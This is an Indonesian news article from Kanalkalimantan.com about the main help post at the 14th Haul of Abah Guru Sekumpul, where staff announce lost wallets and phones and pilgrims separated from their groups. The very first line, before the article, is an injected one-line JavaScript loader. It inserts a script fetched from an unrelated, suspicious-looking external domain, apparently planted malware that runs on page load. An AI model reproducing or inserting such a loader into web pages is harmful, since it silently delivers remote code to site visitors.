(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Haul Sekumpul 14

Kesibukan Petugas Posko Induk, Dari Laporan HP Tercecer hingga Terpisah Rombongan


MARTAPURA, Dompet, hanphone, hingga terpisah dari rombongan adalah laporan informasi terbanyak para jemaah yang mendatangi posko induk saat Haul ke-14, Abah Guru Sekumpul. Dan dengan sabar, petugas pun menyampaikan pengumuman atas temuan maupun laporan dari pengeras suara.

“Saya terpisah dari romongan sejak sholat Magrib tadi, mau pulang ke penginapan tapi tidak tahu kemana lokasinya, saya lupa,” ujar Jamhari, salah satu jamaah asal Kapuas, Minggu (10/3). Ketika ditemui Kanalkalimantan.com.

Berkunjung ke Haul Abah guru Sekumpul, merupakan pengalaman pertama bagi Jamhari. Ia datang sejak Jum’at (8/3) bersama 10 orang lainnya. “Rencananya Senin saya pulang, tergantung situsi juga, kalo tidak macet,” ujarnya di posko induk.

Sementara itu Hairil petugas posko induk mengatakan, hingga dibukanya posko induk sejak H-1, banyak sekali jamaah yang datang untuk meminta bantuan untuk diumumkan terkait dompen hilang, handphone, hingga terpisah rombongan. “Sejak siang tadi hingga tengah malam ini kalau dihitung-hitung mungkin sudah ada 100an jemaah yang minta diumumkan kehilangan, kedapatan dompet HP, hingga terpisah dari rombongan,” akunya.

Ditambahkan Hairil, melalui posko induk tersebut, seluruh jamaah dapat menyampaikan informasinya terkait apa saja yang membutuhkan bantuan untuk selanjutnya diumumkan melalui pengeras suara yang tersebar dilingkungan haul Abah Guru Sekumpul.

“Jadi siapa saja bisa datang kesini, kita bantu, setelah mengisi formulir apa yang bisa kita umumkan, akan kita umumkan, lalu kita arahkan mereka menunggu rombongannya kalau ada yang mencari, esmentara untuk barang juga kita tunggu siapa tahu yang bersangkutan datang kesini mengambil barangnya,” jelasnya.

Untuk posko induk di depan Mushola Ar Raudah dibuka 24 jam. Jadi bagi siapa saja yang mau diinformasikan akan dilayani, namun Hairil menghimbau agar para jemaah lebih berhati-hati dan menjaga berang bawaan pribadinya masing-masing untuk mengantisipasi hal-hal yang tidak diinginkan.

“Saya menghimbau bagi siapa saja, agar lebih hati-hati lagi, jaga barang bawaannya masing-masing, ingat tempat menginapnya masing-masing juga, dan kalau bisa jangan jauh dari rombongannya sehingga tidak terpisah,” pungkasnya. (rendy)

Reporter : Rendy
Editor : Chell

Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

7 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

8 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

9 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

10 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

13 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

16 jam ago

This website uses cookies.